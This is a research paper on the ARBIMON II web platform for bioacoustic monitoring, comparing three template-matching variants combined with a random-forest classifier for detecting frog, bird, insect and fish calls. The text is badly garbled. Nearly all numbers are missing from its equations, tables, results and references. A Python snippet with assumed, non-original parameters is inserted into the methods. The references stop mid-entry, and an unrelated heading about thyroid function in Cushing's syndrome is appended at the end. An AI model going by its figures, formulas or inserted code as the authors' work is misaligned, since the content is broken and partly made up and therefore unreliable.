rico—rio piedras, san juan, puerto rico sieve analytics, inc., san juan, puerto rico department of biology, university of puerto rico—río piedras, san juan, puerto rico abstract we developed a web-based cloud-hosted system that allow users to archive, listen, visualize, and annotate recordings. the system also provides tools to convert these annotations into datasets that can be used to train a computer to detect the presence or absence of a species. 
the algorithm used by the system was selected after comparing the accuracy and efficiency of three variants of a template-based detection algorithm. the algorithm computes a similarity vector by comparing a template of a species call with time increments across the spectrogram. statistical features are extracted from this vector and used as input for a random forest classifier that predicts presence or absence of the species in the recording. the fastest algorithm variant had the highest average accuracy and specificity; therefore, it was implemented in the arbimon web-based system. subjects bioinformatics, computational biology, data mining and machine learning keywords acoustic monitoring, machine learning, animal vocalizations, recording visualization, recording annotation, generic species algorithm, web-based cloud-hosted system, random forest classifier, species prediction, species-specific audio detection introduction monitoring fauna is an important task for ecologists, natural resource managers, and conservationists. historically, most data were collected manually by scientists who went to the field and annotated their observations (terborgh et al., ). this generally limited the spatial and temporal extent of the data. furthermore, given that the data were based on an individual's observations, the information was difficult to verify, reducing its utility for understanding long-term ecological processes (acevedo & villanueva-rivera, ). to understand the impacts of climate change and deforestation on the fauna, the scientific community needs long-term, widespread and frequent data (walther et al., ). passive acoustic monitoring (pam) can contribute to this need because it facilitates the collection of large amounts of data from many sites simultaneously, and with virtually no impact on the fauna and environment (brandes, ; lammers et al., ; tricas & boyle, ; celis-murillo, deppe & ward, ). in general, pam systems include a microphone or a hydrophone connected to a self-powered system and enough memory to store several weeks or months of recordings, but there are also permanent systems that
algorithms for species identification have been developed using spectrogram matched filtering (clark, marler & beeman, ; chabot, ), statistical feature extraction (taylor, ; grigg et al., ), k-nearest neighbor algorithm (han, muniandy & dayou, ; gunasekaran & revathy, ), support vector machine (fagerlund, ; acevedo et al., ), tree- based classifiers (adams, law & gibson, ; henderson, hildebrand & smith ) and template based detection (anderson, dave & margoliash, ; mellinger & clark, ), but most of these algorithms are built for a specific species and there was no infrastructure provided for the user to create models for other species. in this study, we developed a method that detects the presence or absence of a species’ specific call type in recordings with a response time that allows researchers to create, run, tune and re-run models in real time as well as detect hundreds of thousands of recordings in a reasonable time. the main objective of the study was to compare the performance (e.g., efficiency and accuracy) of three variants of a template-based detection algorithm and incorporate the best into the arbimon ii bioacoustics platform. the first variant is the structural similarity index described in wang et al. ( ), a widely use method to find how similar two images are (in our case the template with the tested recording). the second method filters the recordings with the dynamic thresholding method described in van der walt et al. ( ) and then use the frobenius norm to find similarities with the template. the final method uses the structural similarity index, but it is only applied to regions with high match probability determined by the opencv’s matchtemplate procedure (bradski, ). materials and methods passive acoustic data acquisition we gathered recordings from five locations: four in puerto rico and one in peru. some of the recordings were acquired using the automated remote biodiversity monitoring network (arbimon) data acquisition system described in aide et al. ( ), while others were acquired using the newest version of arbimon permanent recording station, which uses an android cell phone and transmits the recorded data through a cellular network. all recordings have a sampling rate of . khz, a sampling depth of -bit and an approximate duration of s (±. s) corrada bravo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure recording locations in puerto rico. map data: google, image—landsat/copernicus and data—sio, noaa, us navy, nga and gebco. figure recording location in peru. map data: google, us dept. of state geographer, image— landsat/copernicus and data—sio, noaa, us navy, nga and gebco. the locations in puerto rico were the sabana seca permanent station in toa baja, the casa la selva station in carite mountains (patillas), el yunque national forest in rio grande and mona island (see fig. ). the location in peru was the amarakaeri communal reserve in the madre de dios region (see fig. ). in all the locations, the recorders were programmed to record one minute of audio every min. the complete dataset has more than , -minute recordings. we randomly chose recordings from puerto rico and recordings from peru for comparing the three algorithm variants. we used the arbimon ii web application interface to annotate the presence or absence of species in all the recordings. regions in the recording where a species emits a sound were also marked using the web interface. 
each region of interest (roi) is a rectangle corrada bravo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table species, class, location and count of recordings with validated data. species group total presence absence location eleutherodactylus cooki amphibian carite eleutherodactylus brittoni amphibian sabana seca eleutherodactylus cochranae amphibian sabana seca eleutherodactylus coqui amphibian sabana seca eleutherodactylus juanariveroi amphibian sabana seca unknown insect insect sabana seca epinephelus guttatus fish mona island megascops nudipes bird el yunque microcerculus marginatus bird peru basileuterus chrysogaster bird peru myrmoborus leucophrys bird peru basileuterus bivittatus bird peru liosceles thoracicus bird peru chlorothraupis carmioli bird peru megascops guatemalae bird peru saltator grossus bird peru myrmeciza hemimelaena bird peru thamnophilus schistaceus bird peru hypocnemis subflava bird peru percnostola lophotes bird peru formicarius analis bird peru delimited by starting time, ending time, lowest frequency and highest frequency along with a species and sound type. the species included in the analysis are listed in table , along with the number of total recordings and the number of recordings where the species is present or absent. algorithm the algorithm recognition process is divided into three phases: ( ) template computation, ( ) model training and ( ) detection (see fig. ). in template computation, all rois submitted by the user in the training set are aggregated into a template. in model training the template is used to compute recognition functions from validated audio recordings and features from the resulting vector v are computed. these features are used to train a random forest model. in the detection phase the template is used to compute the features, but this time the features are fed to the trained random forest model to compute a prediction of presence or absence. in the following sections the template computation process will be explained, then the process of using the template to extract features from a recording is presented and finally, the procedures to use the features to train the model and to detect recordings are discussed. template computation the template refers to the combination of all rois in the training data. to create a template, we first start with the examples of the specific call of interest (i.e., rois) that were annotated corrada bravo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure the three phases of the algorithm to create the species-specific models. in the model training phase reci is a recording, vi is the vector generated by the recognition function on reci and in the detec- tion phase v is the vector generated by the recognition function on the incoming recording. from a set of recordings for a given species and a specific call type (e.g., common, alarm). each roi encompasses an example of the call, and is an instance of time between time t and time t of a given recording and low and high boundary frequencies of f and f , where t < t and f < f . in a general sense, we combine these examples to produce a template of a specific song type of a single species. specifically, for each recording that has an annotated roi, a spectrogram matrix (sm) is computed using the short time fourier transform with a frame size of samples, samples of overlap and a hann analysis window, thus the matrices have rows. 
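A sketch of the ROI extraction step under stated assumptions: the paper's exact frame size and overlap are not legible in this copy, so the values below are placeholders, and scipy's spectrogram with a Hann window plays the role of the short-time Fourier transform described here.

```python
import numpy as np
from scipy.signal import spectrogram

# Assumed STFT parameters (the original values are not legible in this copy).
FRAME = 512
OVERLAP = 256

def roi_matrix(samples, fs, t1, t2, f1, f2):
    """Compute the spectrogram matrix SM of a recording and return the ROI
    submatrix bounded by times [t1, t2] (s) and frequencies [f1, f2] (Hz),
    together with the frequencies its rows represent."""
    freqs, times, sm = spectrogram(samples, fs=fs, window="hann",
                                   nperseg=FRAME, noverlap=OVERLAP)
    rows = (freqs >= f1) & (freqs <= f2)
    cols = (times >= t1) & (times <= t2)
    return sm[np.ix_(rows, cols)], freqs[rows]
```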
for a recording with a sampling rate of , hz, the matrix bin bandwidth is approximately . hz. the sm is arranged so that the row of index represents the lowest frequency and the row with index represents the highest frequency of the spectrum. properly stated the columns c to c and the rows from r to r of sm were extracted, where: c =bt × , c, c =bt × , c, r =bf / . c and r =bf / . c. the rows and columns that represent the roi in the recording (between frequencies f and f and between times t and t ) are extracted. the submatrix of sm that contains only the area bounded by the roi is define as smroi and refer in the manuscript as the roi matrix. since the roi matrices can vary in size, to compute the aggregation from the roi matrices we have to take into account the difference in the number of rows and columns of the matrices. all recordings have the same sampling rate, , hz. thus, the rows from different sms, computed with the same parameters, will represent the same frequencies, i.e., rows with same indexes represent the same frequency. after the roi matrix, smroi , has been extracted from sm, the rows of smroi will also represent specific frequencies. corrada bravo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure flowchart of the algorithm to generate the template of each species. thus, if we were to perform an element-wise matrix sum between two roi matrices with potentially different number of rows, we should only sum rows that represent the same frequency. to take into account the difference in the number of columns of the roi matrices, we use the frobenius norm to optimize the alignment of the smaller roi matrices and perform element-wise sums between rows that represent the same frequency. we present that algorithm in the following section and a flow chart of the process in fig. . template computation algorithm: . generate the set of smroi matrices by computing the short time fourier transform of all the user generated rois. . create matrix smmax, a duplicate of the first created matrix among the matrices with the largest number of columns. . set cmax as the number of columns in smmax. . create matrix ttemp, with the same dimensions as smmax and all entries equal to . this matrix will contain the element-wise addition of all the extracted smroi matrices. corrada bravo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. . create matrix w with the same dimensions of smmax and all entries equal to . this matrix will hold the count on the number of smroi matrices that participate in the calculation of each element of ttemp. . for each one of the smi roi matrices in smroi : (a) if smi has the same number of columns as ttemp: i. align the rows of smi and ttemp so they represent equivalent frequencies and perform an element-wise addition of the matrices and put the result in ttemp. ii. add one to all the elements of the w matrix where the previous addition participated. (b) if the number of columns differs between smi and ttemp, then find the optimal alignment with smmax as follows: i. set ci as the number of columns in smi. ii. define (smmax)i as the set of all submatrices of smmax with the same dimensions as smi. note that the cardinality of (smmax)i is cmax−ci. iii. for each subk ∈(smmax)i : a. compute dk =norm(subk−smi) where norm is the frobenius norm defined as: norm(a)= √∑ (i,j) |a i,j| where ai,j are the elements of matrix a. iv. 
define submin{dk} as the subk matrix with the minimum dk. this is the optimal alignment of smi with smmax. v. align the rows of submin{dk} and ttemp so they represent equivalent frequencies, perform an element-wise addition of the matrices and put the result in ttemp. vi. add one to all the elements of the w matrix where the previous addition participated. . define the matrix ttemplate as the element-wise division between the ttemp matrix and the w matrix. the resulting ttemplate matrix summarizes the information available in the roi matrices submitted by the user and it will be used to extract information from the audio recordings that are to be analyzed. in this article each species ttemplate was created using five rois. in fig. a a training set for the eleutherodactylus coqui is presented and in fig. b the resulting template can be seen. this tool is very useful because the user can see immediately the effect of adding or subtracting a specific sample to the training set. model training the goal of this phase is to train a random forest model. the input to train the random forest are a series of statistical features extracted from vectors vi that are created by computing a recognition function (similarity measure) between the computed ttemplate and submatrices of the spectrogram matrices of a series of recordings. in the following section, we present the details of the algorithm that processes a recording to create the recognition function vector, and in fig. we present a flowchart of the process. corrada bravo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure (a) a training set with examples of the call of e. coqui. (b) the resulting template from the training set. figure flowchart of the algorithm to generate the similarity vector of each recording. algorithm to create the similarity vector: . compute matrix spec, the submatrix of the spectrogram matrix that contains the frequencies in ttemplate. note that we are dealing with recordings that have the same sample rate as the recordings used to compute the ttemplate. . define cspec, the number of columns of spec. . define ctemplate, the number of columns of ttemplate. note that cspec �ctemplate since the spec matrix have the same number of columns as the whole spectrogram and that the corrada bravo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. note that for recordings with a sample rate of , when we calculate the stft with a window of size and a % overlap, one step is equivalent to . ms; therefore, steps is less than ms. although this procedure may miss the strongest match, the length of the calls are much longer than the step interval; therefore, there is a high probability of detecting the species-specific call. ttemplate matrix fits c =cspec −ctemplate+ times inside the spec matrix. there are c submatrices of spec with the same dimensions as ttemplate. . define step, the step factor by which ttemplate will progressed over the spec matrix. . define n= ⌊ cspec−ctemplate step ⌋ + . note that if step= then n=c. in this work, however, this parameter was selected as step= as a trade-off for speed. . define speci as the submatrix of spec that spans the columns from i×step to i×step+ ctemplate. . set i= . . while i≤n (a) compute the similarity measure measi for speci (the definition of measi for each of the three variants is provided in the following section). (b) increase i by . 
note that this is equivalent to progressing step columns in the spec matrix. . define the vector v as the vector containing the n similarity measures resulting from the previous steps. that is, v =[meas ,meas ,meas ,...,measn]. recognition function we used three variations of a pattern match procedure to define the similarity measure vector v . first, the structural similarity index described in wang et al. ( ) and implemented in van der walt et al. ( ) as compare_ssim with the default window size of seven unless the generated pattern is smaller. it will be referred in the rest of the manuscript as the ssim variant. for the ssim variant we define measi as: measi=ssi(ttemplate,speci), where speci is the submatrix of spec that spans the columns from i× step to i×step+ ctemplate and the same number of rows as ttemplate and v =[meas ,meas ,meas , ...,measn] with n= ⌊ cspec −ctemplate step ⌋ + . second, the dynamic thresholding method (threshold_adaptive) described in van der walt et al. ( ) with a block size of and an arithmetic mean filter is used over both ttemplate and speci before multiplying them and applying the frobenius norm and normalized by the norm of a matrix with same dimensions as ttemplate and all elements equal to one. therefore, measi for the norm variant is defined as: measi=fn ( dtm(ttemplate) .∗ dtm(speci) ) /fn(u), where again speci is the submatrix of spec that spans the columns from i×step to i×step+ ctemplate, fn is the frobenius norm, dtm is the dynamic thresholding method, u is a matrix with same dimensions as ttemplate with all elements equal to one and .∗performs an element-wise multiplication of the matrices. again, v =[meas ,meas ,meas ,...,measn] with n= ⌊ cspec −ctemplate step ⌋ + . corrada bravo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. finally, for the corr variation we first apply the opencv’s matchtemplate procedure (bradski, ) with the normalized correlation coefficient option to speci, the submatrix of spec that spans the columns from i×step to i×step+ ctemplate. however, for this variant, speci includes two additions rows above and below, thus it is slightly larger than the ttemplate. with these we can define: measj,i=corr(ttemplate,specj,i) where specj,i is the submatrix of speci that starts at row j (note that there are five such specj,i matrices). now, we select five points at random from all the points above the . percentile of measj,i and apply the structural similarity index to the strongly-matching regions. the size of these regions is eight thirds ( / ) of the length of ttemplate, / before and / after the strongly-matched point that was selected. then, define filterspec as the matrix that contains these strongly-matching regions and filterspeci as the submatrix of filterspec that spans the columns from i to i+ ctemplate then, the similarity measure for this variant is define as: measi=ssi(ttemplate,filterspeci) and the resulting vector v =[meas ,meas ,meas ,...,measn] but this time with n= × (⌊ / ×ctemplate ⌋ + ) . it is important to note that no matter which variant is used to calculate the similarity measures, the result will always be a vector of measurements v . the idea is that the statistical properties of these computed recognition functions have enough information to distinguish between a recording that has the target species present and a recording that does not have the target species present. 
however, notice that since cspec, the length of spec, is much larger that ctemplate the length of the vector v for the corr variant is much smaller than the other two. random forest model creation after calculating v for many recordings we can train a random forest model. first, we need a set of validated recordings with the specific species vocalization present in some recordings and absent in others. then for each recording we compute a vector vi as described in the previous section and extract the statistical features presented in table . these statistical features represent the dataset used to train the random forest model, which will be used to detect recordings for presence or absence of a species call event. these features along with the species presence information are used as input to a random forest classifier with a , trees. recording detection now that we have a trained model to detect a recording, we have to compute the statistical features from the similarity vector v of the selected recording. this is performed in the same way as it was described in the previous section. these features are then used as the input dataset to the previously trained random forest classifier and a label indicating presence or absence of the species in the recording is given as output. corrada bravo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table the statistical features extracted from vector v . features . mean . median . minimum . maximum . standard deviation . maximum–minimum . skewness . kurtosis . hyper-skewness . hyper-kurtosis . histogram . cumulative frequency histogram the experiment in order to decide which of the three variants should be incorporated into the arbimon web-based system, we performed the algorithm explained in the previous section with each of the similarity measures. we computed -fold validations on each of the variants to obtained measurements of the performance of the algorithm. in each validation, % of the data is used as training and % of the data is used as validation data. each algorithm variant used the same -fold validation partition for each species. the measures calculated were the area under the receiver operating characteristic (roc) curve (auc), accuracy or correct detection rate (ac), negative predictive value (npv), precision or positive predictive value (pr), sensitivity, recall or true positive rate (se) and specificity or true negative rate (sp). to calculate the auc, the roc curve is created by plotting the false positive rate (which can be calculated as − specificity) against the true positive rate (sensitivity), then, the auc is created by calculating the area under that curve. notice that the further the auc is from . the better. the rest of the measures are defined as follows: ac = tp+tn tp+tn+fp+fn , npv = tn tn+fn , pr = tp tp+fp , se= tp tp+fn and sp= tn tn+fp with tp the number of true positives (number of times both the expert and the algorithm agree that the species is present), tn the number of true negatives (number of times both the expert and the algorithm agree that the species is not present), fp the number of false positives (number of times the algorithm states that the species is present while the expert states is absent) and fn the number of false negatives (number of times the algorithm states that the species is not present while the expert states it is present). note that accuracy is a weighted average of the sensitivity and the specificity. 
although we present and discuss all measures, we gave accuracy and the auc more importance because they include information on the true positive and true negative rates. corrada bravo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. specifically, auc is important when the number of positives is different than the number of negatives as is the case with some of the species. the experiment was performed in a computer with an intel i k cores processor at . ghz with gb of ram and running ubuntu linux. the execution time needed to detect each recording was registered and the mean and standard deviation of the execution times were calculated for each variant of the algorithm. we also computed the quantity of pixels on all the ttemplate matrices and correlated with the execution time of each of the variants. a global one-way analysis of variance (anova) was performed on the five calculated measures across all of the -fold validations to identify if there was a significant difference between the variants of the algorithm. then, a post-hoc tukey hsd comparison test was performed to identify which one of the variants was significantly different at the % confidence level. additionally, an anova was performed locally between the -fold validation of each species and on the mean execution time for each species across the algorithm variants to identify if there was any significant execution time difference at the % confidence level. similarly, a post-hoc tukey hsd comparison test was performed on the execution times. results the six measurements (area under the roc curve—auc, accuracy, negative predictive value, precision, sensitivity and specificity) computed to compared the model across the three variants varied greatly among the species. the lowest scores were among bird species while most of the highest scores came from amphibian species. table presents a summary of the results of the measurements comparing the three variants of the algorithm (for a detail presentation, see appendix ). the norm variant did not have the highest value for any of the measures summarized in table , while the corr variant had a greater number of species with % or greater for all the measures and an overall median accuracy of %. we considered these two facts fundamental for a general-purpose species detection system. the local species anova suggested that there are significant accuracy differences at the % significance level for six of the species studied as well as four in terms of precision and three in terms of specificity (see https://doi.org/ . /m .figshare. .v ). the algorithm variant corr had a higher mean and median auc at % and % respectively, but the ssim variant seems to be more stable with a standard deviation of %. in terms of accuracy, both the ssim and corr have higher mean accuracy than the norm variant. nevertheless, variant corr had the highest median accuracy of %, which is slightly higher than the median accuracy of the ssim variant at %. in addition, variant corr had more species with an accuracy of % or greater. in terms of median precision, the three variants had similar values, although in terms of mean precision variants ssim and corr have greater values than the norm variant. moreover, the median and mean precision of the ssim variant were only % higher than the median and mean precision of the corr variant. in terms of sensitivity, variants ssim corrada bravo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . 
/m .figshare. .v http://dx.doi.org/ . /peerj-cs. table summary of the measures of the three variants of the algorithm. best values are in bold. summary of measures ssim norm corr number of species with an area under the curve of % or greater number of species with statistically significant area under the curve mean area under the curve . . . median area under the curve . . . standard deviation of area under the curve . . . number of species with an accuracy of % or greater number of species with statistically significant accuracy mean accuracy . . . median accuracy . . . standard deviation of accuracy . . . number of species with a negative predictive value of % or greater number of species with statistically significant negative predictive value mean negative predictive value . . . median negative predictive value . . . standard deviation of negative predictive value . . . number of species with a precision of % or greater number of species with statistically significant precision mean precision . . . median precision . . . standard deviation of precision . . . number of species with a sensitivity of % or greater number of species with statistically significant sensitivity mean sensitivity . . . median sensitivity . . . standard deviation of sensitivity . . . number of species with a specificity of % or greater number of species with statistically significant specificity mean specificity . . . median specificity . . . standard deviation of specificity . . . ratio of false positive to true positive . . . ratio of false negative to true positive . . . ratio of false positive to true negative . . . ratio of false negative to true negative . . . and corr had greater values than the norm variant. it is only in terms of specificity that the corr variant has greater values than all other variants. figures and present a summary of these results with whisker graphs. in terms of execution times, an anova analysis on the mean execution time suggests a difference between the variants (f = . e+ ,df = ,p < . e– ). the corr variant had the lowest mean execution time at . s followed closely by the norm variant with . s, while the ssim variant had the slowest mean execution time of . s (fig. ). the tukey hsd test suggests that there was no statistical significant difference between the corrada bravo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure whisker boxes of the -fold validations for the three variants of the presented algorithm for: (a) area under the roc curve and (b) accuracy. table summary of the execution times of the three variants of the algorithm. best values are in bold. ppmcc is the pearson product-moment correlation coefficient. summary of execution times ssim norm corr mean execution time . . . standard deviation of execution time . . . ppmcc between execution time and size of template . . . mean execution times of the norm and corr variants (p= . ). however, there was a statistical significant difference at the % confidence level between the mean execution times of all other pairs of variants, specifically variants ssim and corr (p < . e– ). moreover, the mean execution time of the ssim variant increased as the number of pixels in the ttemplate matrix increases (fig. b). there was no statistically significant relationship between the ttemplate pixel size and the execution time for the other two variants (table ). 
in summary, variants ssim and corr outperform the norm variant in most of the statistical measures computed having statistically significant high accuracy for three species each. in terms of execution time, the corr variant was faster than the ssim variant (table ), and the mean execution time of corr variant did not increase with increasing ttemplate size (table ). discussion the algorithm used by the arbimon system was selected by comparing three variants of a template-based method for the detection of presence or absence of a species vocalization in recordings. the most important features for selecting the algorithm were that it works well for many types of species calls and that it can process hundreds of thousands of recordings in a reasonable amount of time. the corr algorithm was selected because of its speed corrada bravo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure whisker boxes of the -fold validations for the three variants of the presented algorithm for: (a) negative predictive value, (b) precision, (c) sensitivity and (d) specificity. and its comparable performance in terms of detection efficiency with the ssim variant. it achieved auc and accuracy of . or better in of the species and sensitivity of . or more in of the species and the average execution time of . s per minute of recording means that it can process around , minutes of recordings per hour. the difference in execution time between the ssim variant and the other two was due to a memory management issue in the ssim algorithm. an analysis revealed that all the corrada bravo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure (a) whisker boxes of the execution times of the three algorithms. (b) execution times as a function of the size of the template in number of pixels. algorithms have time complexity of o (( cspec −ctemplate ) ×ctemplate×rtemplate ) where cspec and ctemplate are the number of columns in spec and ttemplate respectively and rtemplate is the number of rows in ttemplate. the only explanation we can give is that the ssim function uses an uniformly distributed filter (uniform_filter) that has a limit on the size of the memory buffer ( , -bit doubles divided by the number of elements in the dimension been process). therefore, as the size of ttemplate increases the number of calls to allocate the buffer, free and allocate again can become a burden since it has a smaller locality of reference even when the machine has enough memory and cache to handle the process. further investigation is required to confirm this. an interesting comparison is the method described in the work by fodor ( ) and adapted and tested by lasseck ( ). this method was design for the neural information processing scaled for bioacoustics (nips b) competition, and although the results are very good they do not report on time of execution. as we have mentioned, it is very important to us to have a method that provides good response times and the execution time of lasseck’s method seems to be greater than ours given the extensive pre-processing that the method performs. corrada bravo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table summary of the usage of the arbimon system and its model creation feature. 
number of users in the system number of recordings in the system , , number of models created by users total number of detected recordings , , number of distinct detected recordings , average times a recording is detected . standard deviation of the number of times a recording is detected . maximum number of times a recordings has been detected conclusions and future work now that passive autonomous acoustic recorders are readily available the amount of data is growing exponentially. for example, one permanent station recording one minute of every minutes every day of the year generates , one minute recordings. if this is multiplied by the need to monitor thousands of locations across the planet, one can understand the magnitude of the task at hand. we have shown how the algorithm used in the arbimon ii web-based cloud-hosted system was selected. we compared the performance in terms of the ability to detect and the efficiency in terms of time execution of three variants of a template-based detection algorithm. the result was a method that uses the power of a widely use method to determine the similarity between two images (structural similarity index (wang et al., )), but to accelerate the detection process, the analysis was only done in regions where there was a strong-match determined by the opencv’s matchtemplate procedure (bradski, ). the results show that this method performed better both in terms of ability to detect as well as in terms of execution time. a fast and accurate general-purpose algorithm for detecting presence or absence of a species complements the other tools of the arbimon system, such as options for creating playlists based on many different parameters including user-created tags (see table ). for example, the system currently has , , -minute recordings uploaded by users and species specific models have been created and run over , , min of recordings of which , are distinct recordings. while this research was a prove of concept, we provide the tools and encourage users to increase the size of the training data set as this should improve the performance of the algorithm. in addition, we will pursue other approaches, such as multi-label learning (xie et al., ; zhang et al., ; briggs et al., ). as a society, it is fundamental that we study the effects of climate change and deforestation on the fauna and we have to do it with the best possible tools. we are collecting a lot of data, but until recently there was not an intuitive and user-friendly system that allowed scientists to manage and analyze large number of recordings. here we presented a web-based cloud-hosted system that provides a simple way to manage large quantities of recordings with a general-purpose method to detect their presence in recordings. corrada bravo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. acknowledgements the authors want to thank marconi campos-cerqueira for his helpful comments on the manuscript. appendix table provide a detail presentation of the performance of each variant of the algorithm: the area under the roc curve, mean accuracy, mean precision, mean sensitivity and mean specificity values for each species, of the -fold validations for the three variants of the presented algorithm (ssim, norm and corr). the mean, median and standard deviation values across all species are presented at the bottom of the table. appendix the templates created by the training sets of each species are presented. 
we classified them by the algorithm that presented a better accuracy for that species. figure presents the templates of the species where the ssim variant presented better accuracy, fig. presents those where the norm variant presented better accuracy, and fig. presents the species where the corr variant presented better accuracy. figure sample of species that the ssim variant presented better accuracy. (a) f. analis, (b) m. hemimelaena, (c) e. cooki, (d) p. lophotes, (e) e. coqui, (f) t. schistaceus and (g) h. subflava. species (a–c) are statistically significant. corrada bravo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table area under the roc curve (auc), accuracy (ac), negative predictive value (npv), precision (pr), sensitivity (se) and specificity (sp) of the species and three variants of the algorithm. best values are shaded and the cases where the anova suggested a significant difference between the algorithm variants at the % con- fidence level are in bold . species ssim norm corr auc ac npv pr se sp auc ac npv pr se sp auc ac npv pr se sp e. brittoni . . . . . . . . . . . . . . . . . . e. cochranae . . . . . . . . . . . . . . . . . . m. guatemalae . . . . . . . . . . . . . . . . . . e. cooki . . . . . . . . . . . . . . . . . . unknown insect . . . . . . . . . . . . . . . . . . e. coqui . . . . . . . . . . . . . . . . . . m. leucophrys . . . . . . . . . . . . . . . . . . e. juanariveroi . . . . . . . . . . . . . . . . . . m. nudipes . . . . . . . . . . . . . . . . . . b. bivittatus . . . . . . . . . . . . . . . . . . c. carmioli . . . . . . . . . . . . . . . . . . l. thoracicus . . . . . . . . . . . . . . . . . . f. analis . . . . . . . . . . . . . . . . . . e. guttatus . . . . . . . . . . . . . . . . . . m. hemimelaena . . . . . . . . . . . . . . . . . . b. chrysogaster . . . . . . . . . . . . . . . . . . s. grossus . . . . . . . . . . . . . . . . . . p. lophotes . . . . . . . . . . . . . . . . . . h. subflava . . . . . . . . . . . . . . . . . . m. marginatus . . . . . . . . . . . . . . . . . . t. schistaceus . . . . . . . . . . . . . . . . . . mean values . . . . . . . . . . . . . . . . . . median values . . . . . . . . . . . . . . . . . . standard dev. . . . . . . . . . . . . . . . . . . c orrada b ravo etal. ( ),p eerj c om put.s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure sample of species that the norm variant presented better accuracy. (a) unknown insect, (b) b. chrysogaster, (c) s. grossus, (d) m. guatemalae and (e) e. juanariveroi. neither is statistically significant. figure sample of species that the corr variant presented better accuracy. (a) e. cochranae, (b) m. leucophrys, (c) b. bivittatus, (d) c. carmioli, (e) m. marginatus, (f) m. nudipes, (g) e. brittoni, (h) e. gut- tatus and (i) l. thoracicus. species (a–c) are statistically significant. corrada bravo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. additional information and declarations funding the authors received no funding for this work. competing interests carlos j. corrada bravo and t. mitchell aide are the founders of sieve analytics, inc. rafael Álvarez berríos was an employee of sieve analytics, inc. author contributions • carlos j. corrada bravo conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. 
• rafael Álvarez berríos conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work. • t. mitchell aide conceived and designed the experiments, analyzed the data, wrote the paper, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: corrada bravo, carlos j ( ): code, recordings, validations and regions of interest. figshare. https://doi.org/ . /m .figshare. .v . references acevedo ma, corrada-bravo cj, corrada-bravo h, villanueva-rivera lj, aide tm. . automated classification of bird and amphibian calls using ma- chine learning: a comparison of methods. ecological informatics : – doi . /j.ecoinf. . . . acevedo m, villanueva-rivera l. . using automated digital recording systems as effective tools for the monitoring of birds and amphibians. wildlife society bulletin : – doi . / - ( ) [ :uadrsa] . .co; . adams md, law bs, gibson ms. . reliable automation of bat call identification for eastern new south wales, australia, using classification trees and anascheme software. acta chiropterologica ( ): – . aide tm, corrada-bravo c, campos-cerqueira m, milan c, vega g, alvarez r. . real-time bioacoustics monitoring and automated species identification. peerj :e doi . /peerj. . anderson se, dave as, margoliash d. . template-based automatic recognition of birdsong syllables from continuous recordings. the journal of the acoustical society of america : – doi . / . . corrada bravo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /m .figshare. .v http://dx.doi.org/ . /j.ecoinf. . . http://dx.doi.org/ . / - ( ) [ :uadrsa] . .co; http://dx.doi.org/ . /peerj. http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. blumstein dt, mennill dj, clemins p, girod l, yao k, patricelli g, deppe jl, krakauer ah, clark c, cortopassi ka, hanser sf, mccowan b, ali am, kirschel ang. . acoustic monitoring in terrestrial environments using microphone arrays: applications, technological considerations and prospectus. journal of applied ecology ( ): – doi . /j. - . . .x. bradski g. . the opencv library. doctor dobbs journal ( ): – . brandes st. . automated sound recording and analysis techniques for bird surveys and conservation. bird conservation international : – doi . /s . briggs f, lakshminarayanan b, neal l, fern xz, raich r, hadley sjk, hadley as, betts mg. . acoustic classification of multiple simultaneous bird species: a multi-instance multi-label approach. the journal of the acoustical society of america ( ): – doi . / . . celis-murillo a, deppe jl, ward mp. . effectiveness and utility of acoustic recordings for surveying tropical birds. journal of field ornithology ( ): – doi . /j. - . . .x. chabot d. . a quantitative technique to compare and classify humpback whale (megaptera novaeangliae) sounds. ethology ( ): – doi . /j. - . .tb .x. clark cw, marler p, beeman k. . quantitative analysis of animal vocal phonology: an application to swamp sparrow song. ethology ( ): – doi . /j. - . .tb .x. fagerlund s. . bird species recognition using support vector machines. eurasip journal on applied signal processing ( ): – . fodor g. . the ninth annual mlsp competition: first place. in: machine learning for signal processing (mlsp), ieee international workshop on ieee, – . grigg g, taylor a, mc callum h, watson g. . 
research

a study of thyroid functions in patients with cushing's syndrome: a single-center experience

